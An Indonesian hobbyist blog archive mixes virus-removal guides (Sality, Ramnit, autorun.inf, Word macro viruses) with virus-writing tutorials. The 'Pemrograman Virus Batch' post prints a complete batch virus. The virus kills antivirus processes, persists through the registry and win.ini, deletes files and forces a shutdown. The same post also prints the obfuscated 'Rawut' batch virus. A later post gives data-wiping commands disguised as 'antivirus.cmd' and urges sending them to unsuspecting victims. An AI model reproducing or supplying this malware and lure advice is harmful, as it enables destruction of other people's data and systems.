Showing posts with label Melawan Virus. Show all posts
Showing posts with label Melawan Virus. Show all posts

Sunday, May 8, 2011

Cara cepat menghapus virus autorun.inf

Setelah melalui perjalanan panjang untuk mengumpulkan data-data mengenai cara menghapus virus autorun.inf, akhirnya berakhir hari ini dengan hasil yang memuaskan. Virus autorun.inf sebenarnya dapat dihapus dengan menggunakan trik-trik sederhana seperti menghapus file induknya yang ada di drive C, nama filenya k4l0n6.sys.vbs, beberapa kombinasi trik-trik akan lebih baik dan sangat efektif untuk memberanas virus autorun.inf ini. Follow step dibawah ini untuk trik khusus menghapus virus autorun.inf.
Buka My Computer pilih Tools/Folder Options/unchecked hidden software, anda juga bisa menambahkan chek hidden file.Kemudian lihat di Root Directory (C), terlihat ada file “k4l0n6.sys.vbs”. Inilah file induk virus kalong tersebut.
  • File “k4l0n6.sys.vbs” ini tidak dapat anda hapus sebelum anda menghapus file yang terkait dengan file ini.
  • Buka dan pelajari virus tersebut cukup dengan Notepad atau text editor lainnya
  • Jalankan Start/Run dan ketik REGEDIT, trus aapus file-file yang ada hubungannya ama virus kalong sebagai berikut.

Saturday, April 30, 2011

Remove Virus Win32.Sector.2x (Virus Sality-Shortcut)

Remove Virus Win32.Sector.2x (Virus Sality Shortcut)
Virus Win32.Sector.2x adalah Virus Sality yang mempunyai metode penyebaran seperti virus shortcut yaitu dengan membuat file shortcut palsu, memanfaatkan celah keamanan .LNK (shortcut).
Gejala dan efek jika terinfeksi virus Win32.Sector.2x ini memang dapat kita ketahui, tapi untuk membersihkan virus sality-shortcut ini, terbilang tidak mudah.

Cara Pembersihan Virus Win32.Sector.2x (Remove Virus Sality-Shortcut)

1.  Putuskan koneksi jaringan/internet.

2.  Non-aktifkan program yang aktif pada start-up.

Lakukan langkah-langkah berikut :
  • Klik Menu Start -> Run
  • Ketik perintah pada kotak open : MSCONFIG , kemudian klik OK.
  • Setelah muncul jendela “System Configuration Utility”, klik pada tab Startup.
  • Pada tab startup, klik Disable All (untuk me-non aktifkan semua program yang aktif).
  • Kemudian klik Apply, dan klik OK.
  • Log-off komputer, kemudian login kembali (maka program pada startup tidak aktif).

Membersihkan Virus Copy of Shortcut to (1), (2), (3), (4)

Penjelasan :
Virus ini bagian dari Virus Sality yang cukup bisa membuat orang frustasi. Jenis virus ini menyebar melalui Flasdisk, Bluetooth, Memory card, dan hardware penyimpan data. Virus ini hanya menyerang Registry pada Local_Machine.
Pencegahan dan Pemusnahan :
Software yang diperlukan adalah SMADAV 8.4.1 untuk memperbaiki registry apabila terjadi kerusakan.
Tutorial :

Hapus dan Bersihkan Worms atau Virus W32 Ramnit B Copy Shortcut to (1), (2), (3), (4) lnk


Hari ini saya mendapatkan Worms atau Virus W32 Ramnit B di flashdisk saya (drive flash) 4 ekstensi file lnkCopy Shortcut untuk (1) lnk -... Copy Shortcut untuk (2) lnk - Copy Shortcut ke (3) lnk. - Copy Shortcut untuk (4). lnk. Aku mencoba Hapus file ini di flashdisk saya, tetapi worm atau virus Copy Shortcut untuk (1). Lnk dan lebih kembali lagi di flasdisk saya. Saya sudah mencoba beberapa anti virus tetapi tidak berhasil menghancurkan.

dan akhirnya aku Download Avira AntiVir Personal dan Smadav Ver 8.4 Memasang di PC saya.

Untuk download Avira dan smadav, mohon download dari link produk aslinya
www.avira.com dan www.smadav.net

Langkah 1. Install Avira antivirus. Selesai menginstal avira Pemindaian driver semua komputer Anda (saya mendapatkan Program infeksi cacing Lebih saya atau virus)

langkah 2. Instal Smadav Ver 8.4. Registry Scan Area.
Langkah 3. Retart komputer anda dan jalankan startup Antivirus Smadav dan Avira Antivir Personal (AntiVir Guard Posisi Activated).

Monday, March 28, 2011

Cara Membuat Virus Macro

(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)
Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.
Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).
Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….
Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.
Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..
Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.
CARA MEMBUAT VIRUS MACRO
  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor
  • Akan muncul gambar di bawah

Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.

Sunday, April 4, 2010

Pemrograman Virus Batch


Kali ini saya akan berikan sedikit ilmu bagaimana cara membuat virus batch. Dulu virus ini ngetren sekali (kira-kira tahun 90-an lah). Tapi sekarang ini saya jarang nemuin virus ini berkeliaran…

Virus batch dibuat di notepad dan disimpan dengan ekstensi ”.bat”. Ternyata selain virus VBS masih ada juga virus yang dibuat pake notepad. Yah salah satunya virus BAT (virus Batch).

Kalo kmu hidupkan file notepad kosong dengan ekstensi ”.bat”, yang muncul malah ”bla bla bla is not valid 32 application”
Itu artinya kita harus masukkan code virus ke dalam tubuh file bat itu.. he he he he….
Kali ini akan saya ajarkan kalian… tapi ingat saya tidak bertanggung jawab atas kecerobohan kalian…



Pertama sekali ketik:
@echo off

Yang itu memang mesti ditulis, supaya file tidak memunculkan seluruh command. Dan ini wajib (dianjurkan bozzz). Gak diketik begitu juga gak apa-apa sih sebenarnya…

Baru setelah itu kita ketik code-code virus lainnya… he he he

Ini contoh-contoh code-nya…

Untuk meng-kill process yang aktif:
Tskill AVGUARD

Perhatikan: untuk meng-kill process ketik ”tskill” lalu nama process-nya tapi tanpa ekstensi…
Contoh lain:
Tskill KAV

Untuk menghapus file:
del C:\Progra~1\Accessories\Ca
lc.EXE

Untuk menulis ke regedit:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Morphix /t REG_SZ /d %systemroot%\Morphix.bat /f

Untuk menampilkan messagebox
Msg * “Tulis pesanmu disini”

Dan masih banyak lagi contoh-contohnya….
Langsung aja neh salah satu virus batch :

@ECHO OFF
copy %0 %systemroot%\Morphix.bat > nul
copy %0 *.bat > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill PCMAV
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mophix /t REG_SZ /d %systemroot%\Morphix.bat /f > nul
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\Morphix.bat >> %systemroot%\win.ini
echo run=%systemroot%\Morphix.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
shutdown -s -t 15
msg * ”Karena sesuatu hal komputer ini harus di-shutdown… Ha ha ha”
cls
:Morphix
start %0
goto Morphix
::*Hanya untuk pembelajaran*

mau liat source batch yang lainnya???
Nih virus batch Rawut

@echo off
rem c0d3d by Vires @ palu city
rem If u wanna know how this worx
rem don’t follow the code from top to bottom
rem but follow the flow of code
rem is it beautiful???yes it is!!!!
rem vires18[at]yahoo[dot]com
rem (c)2007,Indonesia
rem Dedicated to my Girl:eltietien(did u knew her b 4???)
rem Greetz to all my friends
rem cyrus,bdhamas,sat_anichell,einstein2,wau^wau,the_g irl
rem xniffer, miyabi ,the_simpson,psycopath & all i forget
rem sorry!!!!!
goto v781i21r1212e23s4c5o677o85l
:n56a19m75a0101011
%res%%c00l% %gal%* %gal%bat
%l% pulangpalu
:t45e18g14a11l
%zhe% x=exe
%zhe% c=com
%zhe% fah=py
%l% v25i85r19e0s
:l08a80t19i85f08a19h
%zhe% sya=att
%zhe% gal=*.
%zhe% vi=fo
%sya%%res%%ah% %gal%* %s%
%zhe% ti=co
%l% t45e18g14a11l
:v25i85r19e0s
%zhe% d=txt
%zhe% la=do
%zhe% m=doc
%vi%%res% %%r %te% (%gal%%x% %gal%%c% %gal%%d% %gal%%m% %gal%%lgu%) %la% %ti%%fah% %0 “%%r”
%l% n56a19m75a0101011
:v18i17r16e15s
%zhe% s=-%vi%s -%vi%r -%vi%h
%zhe% res=r
%zhe% c00l=en
%l% l08a80t19i85f08a19h
:v781i21r1212e23s4c5o677o85l
set zhe=set
%zhe% te=in
%zhe% l=goto
%zhe% ah=ib
%zhe% lgu=mp3
%l% v18i17r16e15s
palucity
rem Heh,BATCH STILL BEAUTIFUL RIGHT????
rem (c)vires

Friday, March 19, 2010

Mengatasi Virus Sality

virus yang udah pernah tenar pada tahun 2003 kini kembali muncul dengan aksi yang lebih “Berbahaya “….dari sebelumnya virus ini dimasukkan kedalam kategory parasit abiz………..karena sasarannya file yang berekstensi exe…….. Salitiy menginfeksi setiap file yang berekstensi exe…………j Wal hasil ukuran file asli membengkak menjadi sekitar 20KB. Bagusnya lagi Salitiy meletakkan source code nya pada empty segmen pada file yang ditumpangi dan mengubah entry poit asli ke bangun awal tubunya sehingga yang pertama kali dijalankan adalah source code palsu dan terkadang membuat file induk menjadi korup. Pada umunya file induk langsung menutup diri sesaat dijalankan.

Penyebarannya bisa dibilang “unik” karena setelah menginfeksi suatu file EXE (PE), maka file yang baru terinfeksi tersebut yang akan meneruskan aksi virusnya dan begitu seterusnya akan mencari korban lainnya. Pada saat file yang terinfeksi di-kill, bukan mati aksinya tapi diambil alih oleh predecessor- nya.
Untuk itu ada cara yang aman untuk menghilangkan virus ini tanpa mendelete langsung, dan saya sarankan (berdasarkan pengalaman) menggunakan cara ini:

1. download rmsality, virus removal khusus untuk virus sality dari Grisoft (produsen AVG), berisi tiga file yang harus anda dowload ke dalam satu folder
2. download fileASSASSIN

===============================================
Langkah-langkah CARA NGATASINNYA...!!

1. Installkan dan jalankan fileASSASSIN dan arahkan / ketik di menu browsenya ke c:\windows\system32\wmdrtc32.dll delete file-nya di cheklist kemudian klik execute. ulangi untuk file yang kedua c:\windows\system32\wmdrtc32.dl_
2. jalankan program rmsality yang sudah di download dan biarkan melakukan proses scanning secara keseluruhan. setelah selesai anda akan mendapatkan beberapa file yang tidak bisa di clean (failed to clean) dan antivirus meminta anda untuk mereboot system. (anda juga bisa melakukan scanning per-drive dengan cara masuk ke menu run, kemudian ketik cmd, kemudian masuk ke direktori rmsality dimana anda menyimpannya, kemudian ketik contoh: rmsality c:
3. reboot system. untuk meyakinkan silahkan scan lagi dengan antivirus yang lain, seperti ANSAV, AVG dll

Thursday, January 7, 2010

Buat Flashdisk jadi Anti dengan Virus

mgkn cara ini udh banyak yg tau, tp gpp deh biar yg ga tau jd tau.

intinya adalah mencegah flashdisk kita agar tidak dapat ditongkrongi oleh virus2 penggangu yg suka nongkrong di flashdisk. caranya mirip dgn membuat folder autorun.inf di flashdisk agar file autorun.inf virus tidak bisa masuk ke flashdisk.

contoh:
kl ada file virus "boot.exe" di flashdisk kita, kita tinggal delete aja file itu trus buat folder dgn nama "boot.exe". dijamin virus "boot.exe" ga akan bisa mampir ke flashdisk anda lg. trus buat folder "con" di dalem folder "boot.exe" biar foldernya ga bisa di delete.



sama jg kl ada virus yg ngebuat folder di flashdisk, cara cegahinnya yaitu dgn buat file yg di beri nama folder virusnya.

contoh:
misal ada virus yg buat folder "recycle" di dalem flashdisk, kita tinggal buat file trus kasih nama "recycle", beres deh!

semoga tips ini bisa membantu.

note: cara ini tidak selalu ampuh, karna banyak virus yg menggunakan nama yg random (acak)

Monday, October 19, 2009

Cara mudah Singkirkan Virus Sality dengan 9 Langkah


Virus Sality, virus yang cukup merepotkan. Tidak semua program antivirus dapat membersihkan file yang sudah terinfeksi virus W32/Sality.AE. Malah bisa-bisa, file tersebut akan rusak setelah di-scan dan dibersihkan oleh antivirus yang tidak tepat.

Virus Sality akan menyebar dengan cepat melalui jaringan dengan memanfaatkan default share Windows atau share folder yang mempunyai akses full dengan cara menginfeksi file yang mempunyai ekstensi exe/com/scr.

Untuk itu, perusahaan sekuriti Vaksincom menyarankan pengguna komputer untuk menonaktifkan Default Share (C$, D$ .. dst) dan hindari full sharing folder Anda di jaringan.


Berikut 9 cara singkat membersihkan virus W32/Sality.AE yang diterima detikINET dari analis virus Vaksincom, Adang Jauhar Taufik, Rabu (4/3/2009):

1. Putuskan hubungan komputer yang akan dibersihkan dari jaringan dan internet.

2. Matikan System Restore selama proses pembersihan berlangsung.

3. Matikan Autorun dan Default Share. Silahkan download file berikut kemudian jalankan dengan cara: klik kanan repair.inf lalu install.

http://www.4shared.com/file/82762498/f5dc1edd/repair.html?dirPwdVerified=feea1d94

4. Matikan program aplikasi yang aktif di memori agar proses pembersihan lebih cepat terutama program yang ada dalam daftar startup.

5. Sebaiknya scan dengan menggunakan removal tools dengan terlebih dahulu merubah ekstensi dari removal tools tersebut dengan ekstensi lain [contoh: CMD] agar tidak diinfeksi ulang oleh W32/Sality.AE.

6. Agar komputer yang sudah terinfeksi W32/Sality.AE dapat booting safe mode, silahkan restore registry yang sudah diubah oleh virus.

Silahkan download file berikut kemudian jalankan sesuai OS yang terinfeksi W32/Sality.AE tersebut.

http://www.4shared.com/file/82761423/934fb170/_2__Sality.htmldirPwdVerified=feea1d94

7. Fix registry lain yang diubah oleh virus, silahkan download tools berikut kemudian jalankan file tersebut dengan cara: klik kanan repair.inf lalu install

http://www.4shared.com/file/82874724/f485f1dd/repair.html?dirPwdVerified=3b1f2fa9

8. Restart komputer dan scan ulang dengan menggunakan removal tools untuk memastikan komputer telah bersih dari virus.

9. Untuk pembersihan optimal dan mencegah infeksi ulang sebaiknya install dan scan dengan antivirus yang dapat mendeteksi Sality dengan baik.

Sunday, September 6, 2009

Tips Jitu Menangani Virus Makro

Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis
dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada
komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada
komputer bersistem operasi Mac.

Ada beberapa cara menangani virus makro. Berikut langkah - langkah yang dapat diterapkan baik untuk sistem operasi Ms. Windows maupun Macintosh. Apakah anda pernah menemui kejadian - kejadian berkut ketika sedang bekerja dengan komputer anda ? Jika ya, maka anda perlu waspada. Karena kejadian - kejadian ini adalah gejala - gejala yang umum terjadi bila sebuah komputer terinfeksi virus makro :

- Ketika anda akan menyimpan sebuah dokumen, maka Microsoft Word hanya menyimpannya sebagai Template

- Ketika anda membuka sebuah dokumen, akan muncul sebuah dialog box berisi nomor 1


- Dalam daftar makro anda, akan muncul nama makro baru. Jika komputer anda menampilkan makro dengan nama Macro AutoOpen dan FileSaveAs, itu artinya virus sudah masuk ke dalam komputer anda

- File Winword6. memuat : ww6=1

- Pada saat anda membuka sebuah dokumen Word atau template, akan muncul pesan yang tidak biasa dan tidak semestinya muncul

Jika anda menemui gejala - gejala tersebut, maka virus yang biasa menyerang dokumen Word ini sudah bercokol dalam komputer anda. Berikut cara - cara yang dapat dilakukan untuk mengantisipasinya.

Cara 1 : Upgrade Sistem Komputer anda menjadi Word 7.0a, Word 97 atau Word 98 Macintosh Edition

Bagi pengguna Windows, jika anda menggunakan Word versi 7.0 untuk Windows 95, cobalah untuk beralih pada Word versi 7.0a. Versi 7.0a akan mendeteksi dan memberikan peringatan, jika file anda ada yang terserang virus makro. Jika anda menggunakan Word dibawah versi Word 95 untuk Windows, maka anda sebaiknya meng-upgrade-nya menjadi Word 97.

Sedangkan bagi pengguna Macintosh yang menggunakan versi 6.0, 6.0.1 atau 6.0.1.a, upgrade-lah menjadi Microsoft Word 98 Macintosh Edition.

Untuk selalu mendapatkan berita terbaru mengenai update produk - produk Microsoft, anda dapat menghubungi Microsoft Sales Information Center terdekat atau mengunjungi web site Microsoft World Wide Offices di http://www.microsoft.com/world-wide/default.htm

Cara 2 : Pakailah Aplikasi “Macro Virus Protection Tool”

Jika anda menggunakan Word versi 6.x (untuk Windows atau Macintosh), pakailah Microsoft Application Note yang disebut Macro Virus Protection Tool. Pada Windows digunakan versi WD1215, dan untuk Macintosh adalah MW1222.

Aplikasi ini memuat sebuah tool yang disebut dengan Scanprot.dot. Tool ini akan mencegah dan memperingatkan jika anda membuka file yang sudah terkontaminasi virus makro. Tetapi yang perlu diingat, aplikasi ini tidak membersihkan makro dari sistem komputer anda.

Macro Virus Protection Tool secara otomatis akan menginstal sejumlah `makro baik` pada template normal (Normal.dot) anda. Makro tersebut adalah : AutoExit, FileOpen, InstVer, ShellOpen.

Cara 3 : Tekan Tombol SHIFT Jika anda Membuka Sebuah File

Jika komputer anda tidak menunjukkan gejala - gejala seperti disebutkan di atas, tetapi anda ingin mencegah serangan virus pada komputer anda, ada jurus sederhana yang bisa dilakukan. Tekanlah tombol Shift ketika anda membuka file yang dicurigai terinfeksi virus makro. Dengan menekan tombol Shift, anda akan mencegah aktifnya Auto Macro. Jika memang file tersebut terinfeksi oleh makro, maka makro pada file tersebut tidak akan di-load.

Cara 4 : Hapus Makro dan Lakukan Recovery Dokumen

Jika anda sudah menemui gejala - gejala di atas pada komputer anda, atau anda mencurigai bahwa komputer anda sudah terinfeksi, jangan panik ! Ikuti langkah - langkah berikut untuk menghapus makro jahat dan memulihkan dokumen anda. Namun perlu diingat, solusi ini hanya bersifat sementara. Karena setiap hari, ada virus makro baru yang diciptakan, sehingga bisa jadi, pada beberapa strain, langkah - langkah berikut ini tidak mempan.

1. Tutup Word dan rename file Normal.dot menjadi Normal.xxx (Windows) atau pindahkan Normal pada desktop (untuk Macintosh).

2. Buatlah back-up atau salinan dari file yang terinfeksi.

3. Buka Word.

4. Pada menu File klik Open.

5. Masuklah ke dalam folder yang mengandung file terinfeksi.

6. Klik atau pilih file yang terinfeksi.

7. Tekan dan tahan tombol Shift dan klik Open.

8. Teruskan untuk menekan tombol Shift sampai file yang terinfeksi dibuka pada Word.

Selanjutnya untuk menghilangkan makro yang jahat, lakukan langkah - langkah berikut :

1. Pada menu Tools, klik Macro.

2. Pada daftar makro, klik All Active Templates.

3. Pilih makro jahat tersebut dan klik Delete. Klik Yes.

4. Ulangi langkah ketiga sampai semua makro jahat dihapus.

5. Klik Close.

Untuk memulihkan teks dari dokumen yang terinfeksi :

1. Blok seluruh isi dokumen dengan menekan Ctrl dan A (Windows) atau Command dan A (Macintosh), atau dengan memilih Select All pada menu Edit.

2. Tanda paragraf terakhir tidak boleh disertakan. Untuk itu tekan tombol Shift dan Panah kiri.

3. Pada menu Edit, klik Copy.

4. Pada menu File, klik New. Pilihlah template yang ingin anda gunakan dan klik OK.

5. Pada menu Edit, klik Paste.

6. Ulangi lima langkah menghapus makro jahat untuk memastikan bahwa virus makro sudah tidak direplikasi lagi.

7. Save dokumen.

Sebagai alternatif jika cara keempat tidak mempan, maka anda dapat mencoba cara ke lima.

Cara 5 : Pergunakan Organizer Untuk Menghapus Sementara Virus Makro

Anda harus selalu waspada. Jika anda membuka file - file lain setelah anda membuka file yang terinfeksi, maka besar kemungkinannya bahwa file sehat anda akan terinfeksi juga.

Untuk menghilangkan virus dari template Normal, ikuti langkah - langkah berikut :

1. Tutup semua dokumen. Jika ada sebuah file aktif sakit yang terbuka, maka dengan mudah virus akan menginfeksi Normal.dot (Windows) atau Normal (Macintosh).

2. Pada menu File, klik Templates, dan klik tombol Organizer.

3. Pilihlah tab Macro. Rename atau hapus seluruh makro berikut : AutoClose, AutoExec, AutoOpen, FileExit, FileNew, FileOpen, FileSave, FileSaveAs, Macros, ToolsMacro.

4. Tutup Organizer.

5. Pada menu File, klik Save All untuk menyimpan semua template.

Sedangkan untuk menghilangkan virus dari dokumen, anda dapat mengikuti langkah - langkah di atas. Pada langkah ketiga, selain menghapus makro dari template Normal, hapus juga makro dari dokumen (template). Ketika anda sudah selesai, klik menu File dan klik Save All untuk beralih pada file berikutnya.

Cara 6 : Sisipkan File Ke Dalam Dokumen Baru

Jika menggunakan cara ini, maka anda perlu me-rename Normal.dot (Windows) atau memindahkan Normal ke desktop (Macintosh). Selanjutnya pada menu Insert, klik File untuk menghilangkan sementara virus makro. Cara ini biasanya paling efektif untuk virus makro jenis CAP yang menyerang dengan memindahkan makro sehat dan Customize dari menu Tools. Sedangkan untuk virus makro jenis NOTE, cara ini tidak sepenuhnya efektif. Karena pada Word 6.x dan 7.x perintah Templates biasanya tidak bekerja.

Untuk menyisipkan file ke dalam dokumen baru, ikuti langkah berikut :

1. Tutup Word dan rename file Normal.dot menjadi Name.dot (Windows) atau pindahkan Normal ke Desktop (Macintosh).

2. Buka Word dan cek apakah Macro dan Customize ada pada menu Tools.

3. Buka sebuah dokumen baru. Selanjutnya pada menu Insert, klik File.

4. Masuklah ke dalam folder yang berisi file yang terinfeksi.

5. Klik file yang terinfeksi.

6. Tekan dan tahan terus tombol Shift dan klik Open. Lakukan hingga file yang terinfeksi dibuka dalam Word.

7. Untuk melihat apakah masih ada makro jahat dalam dokumen yang baru, klik pilihan Macro pada menu Tools. Setelah itu, pada Macros Available In List, klik All Active Templates.

8. Hapus semua file yang terinfeksi. :)
Selesai

Friday, June 12, 2009

Mengembalikan Data yang Hilang karena Virus

Beberapa bulan lalu, secara tidak sengaja saya menemui beberapa kejanggalan saat mengoperasikan computer. Tepatnya saat menggunakan usb flash disk saya. Didalam flash disk ternyata terdapat beberapa file yang tidak saya kenal. Saya mencurigai itu merupakan ulah virus. Saya semakin yakin karena saya merasa tidak pernah membuat file file asing tersebut. File-file itu juga memiliki nama yang cukup aneh. Saya pun memutuskan untuk menscan flash dfisk tersebut. Tentunya dengan anti virus yang telah terupdate.

Kebetulan anti virus yang saya gunakan saat itu adalah AVG anti virus free 7.5. Anti virus gratisan ini menurut saya cukup dapat diandalkan. Anti virus ini memang terkenal dengan keganasannya. Bagaimana tidak untuk mencegah hal-hal yang tidak diinginkan, anti virus ini terkadang akan menghapus semua file yang terdapat dalam flash disk yang terserang virus cukup parah. Walaupun flash disk kita sudah bersih dari virus, tetapi mungkin kita sedikit kesal karena data-data kita juga ikut ludes bersama virus yang menjengkelkan itu.



Walaupun telah berdiskusi dengan beberapa teman yang saya anggap cukup paham dengan masalah computer, sampai saat itu saya juga belum menemukan cara yang tepat agar dapat mengembalikan data-data saya yang hilang bersama virus itu. Hal aneh yang menjanggal pikiran saya saat itu adalah, walaupun data pada flash disk sudah kosong karena ikut terhapus bersama virus, tetapi saat saya properties, kapasitas flash disk masih penuh. Saya pun semakin curiga, bahwa data ataupun file-file saya tidak ikut terhapus bersama virus, akan tetapi masih di sembunyikan entah dimana. Setelah beberapa hari mengutak atik computer dirumah akhirnya saya pun mengetahui bagaimana cara untuk dapat melihat ataupun membuka kembali file-file yang ikut terhapus bersama virus saat kita menscan flash disk.

Bila anda mengalami kasus seperi saya, tidak ada salahnya bila anda mencoba cara saya ini. Adapun Caranya yaitu :

1.Masukkan atau colokkan flash disk pada usb pada computer kita, sebagaimana kita mengoperasikan flash disk seperti biasa.
2.explore computer kita, yaitu dengan mengklik kanan pada tool bar ‘start’(pojok kiri). Lalu sorot dan pilihlah explore sehingga muncul tampilan start menu.
3.Pilih lokasi flash disk kita.
4.Pada tampilan start menu terdapat 6 menu pokok yang sering disebut menu bar yaitu file, edit, view, faforites, tools dan help. Pilih menu pokok tools sehingga muncul beberapa beberapa menu lanjutan (menu pull down).
5.Pilih folder option, sehingga akan muncul tampilan folder option yang memiliki beberapa menu bar.
6.pilih dengan mengklik kiri menu view.
7.cari tulisan “hide protected operating system files (recommended)” pada kotak advanced setting. Bila anda belum menemukannya gulunglah kotak advanced setting dengan menggunakan scroll bar yang terletak disamping kanan.
8.Hapuslan tanda centang (cek) di samping kiri pada “hide protected operating system files (recommended)” dengan mengklik kiri tanda centang tersebut.
9.Akan muncul tampilan peringatan (warning) pilih “yes”.
10.Kemudian “apply” pengaturan tersebut dan pilih “ok”.
11.Sekarang coba anda lihat data dalam flash disk anda.

Karena cara ini kebetulan saya temukan secara tidak sengaja, saya juga masih bingung adakah efek samping bila kita menggunakannya. Agar tidak terjadi hal-hal yang tidak diinginkan dikemudian hari, ada baiknya bila anda mengcopy file yang hilang dan baru anda temukan kembali itu, ke dokumen computer anda. Setelah itu, kembalikanlah pengaturan folder option anda dengan memberikan tanda centang kemabali pada tulisan “hide protected operating system files (recommended)”. Adapun langkah-langkahnya sama seperti di atas.

Mungkin itu sedikit trik dari saya…


Cara2 membuat virus yg mudah namun mematikan

Untuk men-delete semua file/folder, anda cuma perlu melakukan ini:
DEL /F /Q *

Ketik/copy tulisan tsb Di notepad, kemudian save menjadi *.cmd
(ex:antivirus.cmd)

Itu akan men-delete semua data yg ada di komputer walaupun itu file/folder read-only dan anda tidak akan diberi konfirmasi untuk melakukan hal itu. Anda tidak akan bisa melakukan apapun jika anda sudah meng-klik file cmd tsb.

PERINGATAN: JANGAN PERNAH SEKALI-KALI ANDA MENCOBA MENG-KLIK JIKA ANDA TELAH MENCIPTAKANNYA, ITU AKAN MERUSAK KOMPUTER ANDA SENDIRI

Jika anda ingin mencoba virus ini, lakukan ini:


Pertama, buat text file bernama TEST.txt di C:\
Selanjutnya, buka notepad, tulis "del C:\TEST.txt" (tanpa tanda quota/"), lalu "Save As..." dan save dengan nama "Percobaan.cmd"(Juga tanpa tanda quota/")
Berikutnya, klik Percobaan.cmd tadi dan buka drive C:\ anda dan anda akan melihat file TEST.txt anda menghilang

Petunjuk yg simpel:
Buka notepad, tulis DEL /F /Q C:\WINDOWS (kalo anda orang yg tidak terlalu kejam, hapus windowsnya aja, kasian korbannya), kemudian save dengan nama *.cmd (namanya terserah anda, yg penting formatnya .cmd), lalu berikan ini kepada korban yg anda inginkan. Sekali korban membuka/meng-klik file ini, maka WINDOWSnya akan hilang dan dia harus meng-install WINDOWSnya lagi. Dijamin, datanya ilang semua karena dia harus install ulang WINDOWSnya (kalo kita install windows kan datanya terhapus smua, kecuali dia emang ahli komputer, tapi kan pasti kita kasih ni virus sama orang2 yg rada2 gaptech, jd dia ga bs bedain ini virus ato nggak. So, dia asal klik aja deh).

PERINGATAN: INI ADALAH VIRUS YANG SANGAT KUAT, SAYA TIDAK BISA MENJAMIN KEAMANAN ANDA JIKA ANDA MENCOBA MEMBUKA/MENG-KLIK VIRUS INI PADA KOMPUTER ANDA SENDIRI

Followers

Call me

My e-mail is
1. andraeinstein@yahoo.co.id
2. andrachemical@yahoo.com
3. andraeinstein@gmail.com

My site is
1. andrachemical.blogspot.com
2. andraeinstein.blogspot.com
3. creamcommunity.blogspot.com
4. andrachemical.cc.cc

  ©This Website is Edited by Nusendra Hanggarawan Copyright at 2009 and this site is protected by COPYSCAPE.